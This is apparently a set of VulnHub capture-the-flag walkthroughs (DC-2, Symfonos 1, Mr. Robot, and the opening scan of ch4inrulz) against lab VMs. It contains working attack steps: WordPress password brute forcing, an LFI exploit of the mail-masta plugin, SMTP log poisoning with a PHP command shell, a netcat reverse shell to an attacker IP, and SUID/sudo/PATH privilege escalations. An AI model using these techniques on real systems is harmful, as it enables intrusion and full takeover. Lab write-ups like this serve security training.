VulnHub: DC-2 Walkthrough

We start off with a nmap scan of the remote host.

root@ubuntu:~/src# nmap -p- -T5 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-31 18:10 MDT
Warning: 192.168.56.101 giving up on port because retransmission cap hit (2).
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 5.81% done; ETC: 18:11 (0:01:37 remaining)
Nmap scan report for dc-2 (192.168.56.101)
Host is up (0.00051s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
80/tcp   open  http
7744/tcp open  raqmon-pdu
MAC Address: 08:00:27:5E:07:20 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 181.37 seconds
root@ubuntu:~/src# 

We see two ports open: 80 and 7744 if we telnet to port 7744 we get the following result.

root@ubuntu:~/src# telnet 192.168.56.101 7744
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u7
^]
Protocol mismatch.
Connection closed by foreign host.
root@ubuntu:~/src# 

It seems that SSH is running on a non-standard port which we will probily need later. Next we scan the host with nikto.

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2019-10-31 18:35:24 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://dc-2/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7946 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2019-10-31 18:36:49 (GMT-6) (85 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program# 

Nikto only came back with a wordpress install on the system. If we visit the site we see this:

We found our first flag on the blog page for dc-2.

Flag 1:

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

We ran wordpress scan agaisnt the website and enumerated possible users on the wordpress system and got back some results.

[i] User(s) Identified:

[+] admin
 | Detected By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Detected By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

We got three usernames back: admin,jerry,tom. Now we can use the 'cewl' tool we read about in flag1 and generate a wordlist to run a brute force against.

./cewl.rb http://dc-2/ -w dc-2.txt

After we generate some passwords we move on to brute forcing the users we got back with wpscan and using our wordlist against the wordpress installion.

wpscan --url http://dc-2/ -U /home/sam/dc-2-users.txt -P /home/sam/dc-2.txt threads 50

[i] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

We cracked two of the accounts we found ealier. Now lets try and log in to wordpress and see what we find.

Flag 2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

We found another flag with a hint. Other than that there was nothing in the wordpress install that could be exploited. But if you remember SSH is running on port 7744 lets try and login with one of the following usernames.

root@ubuntu:~/src# ssh -p 7744 tom@192.168.56.101
The authenticity of host '[192.168.56.101]:7744 ([192.168.56.101]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.56.101]:7744' (ECDSA) to the list of known hosts.
tom@192.168.56.101's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ 

We login with 'tom' and his password we cracked earlier. If we try to issue commands we see that we are in an rbash restricted shell. So to view the file we use vim and break out of the restricted shell

flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

vi flag3.txt
:set shell=/bin/bash
:shell

Once we break out of the rbash shell we change directory to jerry and find another flag.

tom@DC-2:/home$ cd jerry/
tom@DC-2:/home/jerry$ ls
flag4.txt
tom@DC-2:/home/jerry$ cat flag4.txt 
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

tom@DC-2:/home/jerry$ 

If we try to su to jerry with the password we found before with wpscan we get a positive result.

tom@DC-2:/home/jerry$ su jerry
Password: 
jerry@DC-2:~$ 

Checking sudo rights we get:

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
jerry@DC-2:~$ 

So jerry can run the git command as root with no password if we go to a website called https://gtfobins.github.io/gtfobins/git/ it tells us how to break out to a shell with the git program.

sudo git -p help config
!/bin/sh

We issue the command and break out in to a root shell.

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# cd /root
# ls
final-flag.txt
# cat final-flag.txt
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

# 

VulnHub: Symfonos 1 Walkthrough

First lets start off with an nmap scan of the remote host.

root@ubuntu:~# nmap -sV -sC -O -T5 192.168.56.102

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-25 14:41 MDT
Nmap scan report for 192.168.56.102
Host is up (0.00064s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (EdDSA)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:F0:3A:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -6h00m02s, deviation: 0s, median: -6h00m02s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos
|   NetBIOS computer name: SYMFONOS\x00
|   Domain name: \x00
|   FQDN: symfonos
|_  System time: 2019-10-25T09:41:42-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-10-25 08:41:42
|_  start_date: 1600-12-31 17:00:04

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.96 seconds
root@ubuntu:~# 

NMAP returns a lot of results and seems ports 22,25,80,139 and 445 are open. Lets start off by enumerating the smtp server for potental users on the system using metasploit.

msf5 auxiliary(scanner/smtp/smtp_enum) > run

[*] 192.168.56.102:25     - 192.168.56.102:25 Banner: 220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
[+] 192.168.56.102:25     - 192.168.56.102:25 Users found: , backup, bin, daemon, ftp, games, gnats, irc, list, lp, mail, man, messagebus, news, nobody, postmaster, proxy, sshd, sync, sys, uucp, webmaster, www, www-data
[*] 192.168.56.102:25     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smtp/smtp_enum) > 

Metasploit didnt come back with anything interestings so lets move on to ports 139 and 445. We see that smb sharing is active lets connect to the server and see if we can list the shares on the server.

root@ubuntu:~# smbclient -L //192.168.56.102 -N
WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	helios          Disk      Helios personal share
	anonymous       Disk      
	IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            SYMFONOS
root@ubuntu:~# 

We found two shares 'helios' and 'anonymous' lets connect to anonymous and see if there are any files in there.

root@ubuntu:~# smbclient //192.168.56.102/anonymous -N
WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun 28 19:14:49 2019
  ..                                  D        0  Fri Jun 28 19:12:15 2019
  attention.txt                       N      154  Fri Jun 28 19:14:49 2019

		19994224 blocks of size 1024. 17304232 blocks available
smb: \> more attention.txt
getting file \attention.txt of size 154 as /tmp/smbmore.J6XJzb (5.2 KiloBytes/sec) (average 5.2 KiloBytes/sec)
smb: \> get attention.txt
getting file \attention.txt of size 154 as attention.txt (50.1 KiloBytes/sec) (average 9.4 KiloBytes/sec)
smb: \> 

root@ubuntu:~# cat attention.txt

Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'! 

Next person I find using one of these passwords will be fired!

-Zeus

root@ubuntu:~# 

We find a file telling us some passwords not to use lets go back to the console and try to login in to the helios share with one of the following passwords.

root@ubuntu:~# smbclient //192.168.56.102/helios --user=helios
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\helios's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun 28 18:32:05 2019
  ..                                  D        0  Fri Jun 28 18:37:04 2019
  research.txt                        A      432  Fri Jun 28 18:32:05 2019
  todo.txt                            A       52  Fri Jun 28 18:32:05 2019

		19994224 blocks of size 1024. 17278144 blocks available
smb: \> 

1. Binge watch Dexter
2. Dance
3. Work on /h3l105

The password for the user helios is 'qwerty' and we find two files in the share. Research.txt didnt have much information, but todo.txt gives us a directory to work with, if we visit /h3l105 we find a wordpress install. Now its time to fire up wpscan and lets see what if can find.

[+] admin
 | Detected By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://symfonos.local/h3l105/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

Plugins

[+] mail-masta
 | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt

[+] site-editor
 | Location: http://symfonos.local/h3l105/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.1.1 (80% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/site-editor/readme.txt

wpscan came back with some good results we found two plugins we can search for vulnerabiltes for the mail-masta and site editor. After doing some searching, I found a working exploit here: https:/www.exploit-db.com/exploits/40290 . So now all there is to do is paste the url in and include files from the remote system.

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
sys:x:3:3:sys:/dev:/usr/sbin/nologin 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/usr/sbin/nologin 
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 
systemd-timesync:x:100:102:systemd 
Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd 
Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd 
Resolver,,,:/run/systemd/resolve:/bin/false 
systemd-bus-proxy:x:103:105:systemd 
Bus Proxy,,,:/run/systemd:/bin/false _apt:x:104:65534::/nonexistent:/bin/false 
Debian-exim:x:105:109::/var/spool/exim4:/bin/false 
messagebus:x:106:111::/var/run/dbus:/bin/false 
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin 
helios:x:1000:1000:,,,:/home/helios:/bin/bash 
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false 
postfix:x:109:115::/var/spool/postfix:/bin/false

We see the user 'helios' is on the system. Now we need to poison a log file so that we can include it and execute commands on the remote system. If you remember there is a SMTP server running on the remote host. We can posion the mail log file and include it in the LFI on the wordpress site and run commands if all goes well.

root@ubuntu:~/src/nikto/program# telnet 192.168.56.102 25
Trying 192.168.56.102...
Connected to 192.168.56.102.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
MAIL FROM: 
250 2.1.0 Ok
RCPT TO helios
501 5.5.4 Syntax: RCPT TO:

RCPT TO: helios
250 2.1.5 Ok
data
354 End data with <CRgt;<LF>.<CRgt;<LFgt;
<?php system($_GET['c']); ?gt;       
.
250 2.0.0 Ok: queued as 9FDE640698
quit
221 2.0.0 Bye
Connection closed by foreign host.
root@ubuntu:~/src/nikto/program# 

We successfully added our php code to a place where the log file will print out the contents of our message which will be interepted as php code on the remote host. What we want is a reverse shell so we try netcat and see if it works.

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&c=nc -e /bin/bash 192.168.56.101 4444

root@kali:~# nc -l -v -p 4444
listening on [any] 4444 ...
192.168.56.102: inverse host lookup failed: Unknown host
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 49342
python -c 'import pty; pty.spawn("/bin/bash")'


We get a connect back and drop to a system shell. Our next task is to search for SUID able file on the remote host.


helios@symfonos:/var/www/html/h3l105$ find / -xdev -perm -4000 -type f 2>/dev/null
<3l105$ find / -xdev -perm -4000 -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping
helios@symfonos:/var/www/html/h3l105$ 


We find one that sticks out '/opt/statuscheck'. If we run strings on the binary we get back some interesting results.

helios@symfonos:/var/www/html/h3l105$ strings /opt/statuscheck
strings /opt/statuscheck
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
curl -I H
http://lH
ocalhostH
AWAVA
AUATL
[]A\A]A^A_
;*3$"
GCC: (Debian 6.3.0-18+deb9u1) 6.3.0 20170516
helios@symfonos:/var/www/html/h3l105$ 


We can see that is executes the command 'curl -I http://localhost'. What we want to do is elevate our privelges using the statuscheck program and PATH injection. First we change directory to /tmp so we can set up our bogus curl binary.

helios@symfonos:/var/www/html/h3l105$ cd /tmp
cd /tmp
helios@symfonos:/tmp$ echo "/bin/sh" > curl
echo "/bin/sh" > curl
helios@symfonos:/tmp$ chmod 777 curl


Next we will export the path /tmp in our home PATH so that it will search that directory first for any binaries to be run and it will execute our curl program with root privleges and give us a shell.

helios@symfonos:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
helios@symfonos:/tmp$ echo $PATH
echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
helios@symfonos:/tmp$ 


After that all there is to do is run /opt/statuscheck and see if we get a root shell.

helios@symfonos:/tmp$ /opt/statuscheck
/opt/statuscheck
# id
id
uid=1000(helios) gid=1000(helios) euid=0(root) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
# whoami
whoami
root
# cd /root
cd /root
# ls -la
ls -la
total 24
drwx------  2 root root 4096 Jun 28 21:09 .
drwxr-xr-x 22 root root 4096 Jun 28 19:27 ..
lrwxrwxrwx  1 root root    9 Jun 28 19:48 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Jun 28 21:03 .selected_editor
-rw-r--r--  1 root root 1735 Jun 28 19:38 proof.txt
# cat proof.txt
cat proof.txt

	Congrats on rooting symfonos:1!

                 \ __
--==/////////////[})))==*
                 / \ '          ,|
                    `\`\      //|                             ,|
                      \ `\  //,/'                           -~ |
   )             _-~~~\  |/ / |'|                       _-~  / ,
  ((            /' )   | \ / /'/                    _-~   _/_-~|
 (((            ;  /`  ' )/ /''                 _ -~     _-~ ,/'
 ) ))           `~~\   `\\/'/|'           __--~~__--\ _-~  _/, 
((( ))            / ~~    \ /~      __--~~  --~~  __/~  _-~ /
 ((\~\           |    )   | '      /        __--~~  \-~~ _-~
    `\(\    __--(   _/    |'\     /     --~~   __--~' _-~ ~|
     (  ((~~   __-~        \~\   /     ___---~~  ~~\~~__--~ 
      ~~\~~~~~~   `\-~      \~\ /           __--~~~'~~/
                   ;\ __.-~  ~-/      ~~~~~__\__---~~ _..--._
                   ;;;;;;;;'  /      ---~~~/_.-----.-~  _.._ ~\     
                  ;;;;;;;'   /      ----~~/         `\,~    `\ \        
                  ;;;;'     (      ---~~/         `:::|       `\\.      
                  |'  _      `----~~~~'      /      `:|        ()))),      
            ______/\/~    |                 /        /         (((((())  
          /~;;.____/;;'  /          ___.---(   `;;;/             )))'`))
         / //  _;______;'------~~~~~    |;;/\    /                ((   ( 
        //  \ \                        /  |  \;;,\                 `   
       (<_    \ \                    /',/-----'  _> 
        \_|     \\_                 //~;~~~~~~~~~ 
                 \_|               (,~~   
                                    \~\
                                     ~~

	Contact me via Twitter @zayotic to give feedback!


# 


As you can see our binary executed just as we planned and gave us a root shell

VulnHub: Mr. Robot Walkthrough

First we start off with an nmap scan of the remote host.

root@ubuntu:~# nmap -sV -sC -O -T5 192.168.56.102

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-23 13:35 MDT
Nmap scan report for 192.168.56.102
Host is up (0.00045s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 08:00:27:F3:91:E4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.89 seconds
root@ubuntu:~# 

NMAP came back with two ports open 80 and 443. Our next task is to file up nikto and run it against the remote host. We run nikto and dont really find anything interesting but some files which apply wordpress but we check them out anyways. If we navigate to the license.txt file we find the following:

http://192.168.56.102/license.txt

what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
do you want a password or something?
ZWxsaW90OkVSMjgtMDY1Mgo=

If we scroll down to the very bottom we find a base64 encoded string. If we decode the string we find the following:

root@ubuntu:~/src/nikto/program# echo ZWxsaW90OkVSMjgtMDY1Mgo= | base64 -d
elliot:ER28-0652
root@ubuntu:~/src/nikto/program# 

It looks like a user and pass combination we can use later. Our next task is to run dirb against the remote host and see what it finds. Dirb didnt come back with anything worthwhile so the site has a wordpress installation we will hit it with wpscan and see what it says. wpscan did not find anything useful, but we do have the username and password from earlier. Lets try to login to wordpress with the supplied credentials.

It works! so now our next task is to try and upload a reverse shell to the box to get a connect back from the remote machine.

Since we are wordpress admins we can edit the files within wordpress some of which contain php code and replace it with our own shell code to connect back and get a shell. We will use the 404.php template as our file.

Once we edited the 404.php all we need to do is visit the page so our php will connect back to our netcat listener on our local box.

root@kali:~# nc -l -v -p 4444
listening on [any] 4444 ...
192.168.56.102: inverse host lookup failed: Unknown host
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 45768
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 13:05:35 up 23 min,  0 users,  load average: 0.00, 0.13, 0.29
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ 

We get a shell on the box but lets first upgrade our shell to bash.

$ python -c 'import pty; pty.spawn("/bin/bash")'
daemon@linux:/$ pwd
pwd
/
daemon@linux:/$

If we change directory to /home we find a user robot. If we ls the directory we see the next key and a password file. Lets cat the password file and see what is says.

daemon@linux:/$ cd /home
cd /home
daemon@linux:/home$ ls -la
ls -la
total 12
drwxr-xr-x  3 root root 4096 Nov 13  2015 .
drwxr-xr-x 22 root root 4096 Sep 16  2015 ..
drwxr-xr-x  2 root root 4096 Nov 13  2015 robot
daemon@linux:/home$ cd robot
cd robot
daemon@linux:/home/robot$ ls -la
ls -la
total 16
drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
daemon@linux:/home/robot$
daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
daemon@linux:/home/robot$

This is an md5 hash and we cracked it online using Crackstation.

If we try and su to user robot with the following password we get a successful login.

daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:~$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
robot@linux:~$ pwd
pwd
/home/robot
robot@linux:~$ ls
ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$ 

We got the second key, now its time to escalate our privileges to root. We start by looking at the SUID able files on the system.

robot@linux:~$ find / -xdev -perm -4000 -type f 2>/dev/null
find / -xdev -perm -4000 -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
robot@linux:~$

We see that /usr/local/bin/nmap is SUID able and we know we can break out to a root shell with it in interactive mode.

robot@linux:~$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h  for help
nmap> !sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# whoami
whoami
root
# cd /root
cd /root
# ls -la
ls -la
total 32
drwx------  3 root root 4096 Nov 13  2015 .
drwxr-xr-x 22 root root 4096 Sep 16  2015 ..
-rw-------  1 root root 4058 Nov 14  2015 .bash_history
-rw-r--r--  1 root root 3274 Sep 16  2015 .bashrc
drwx------  2 root root 4096 Nov 13  2015 .cache
-rw-r--r--  1 root root    0 Nov 13  2015 firstboot_done
-r--------  1 root root   33 Nov 13  2015 key-3-of-3.txt
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-------  1 root root 1024 Sep 16  2015 .rnd
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
# 

As you can see we found the thrid and final key in the VM and got root.

VulnHub: ch4inrulz Walkthrough

]

First we start off with an nmap scan of the remote host.

root@ubuntu:~# nmap -sV -sC -O -Pn -T5 192.168.56.106

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-21 11:24 MDT
Nmap scan report for 192.168.56.106
Host is up (0.00042s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.3.5
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.56.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d4:f8:c1:55:92:75:93:f7:7b:65:dd:2b:94:e8:bb:47 (DSA)
|   2048 3d:24:ea:4f:a2:2a:ca:63:b7:f4:27:0f:d9:17:03:22 (RSA)
|_  256 e2:54:a7:c7:ef:aa:8c:15:61:20:bd:aa:72:c0:17:88 (ECDSA)
80/tcp   open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: FRANK's Website | Under development
8011/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:0B:EB:F1 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.19 - 2.6.36
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
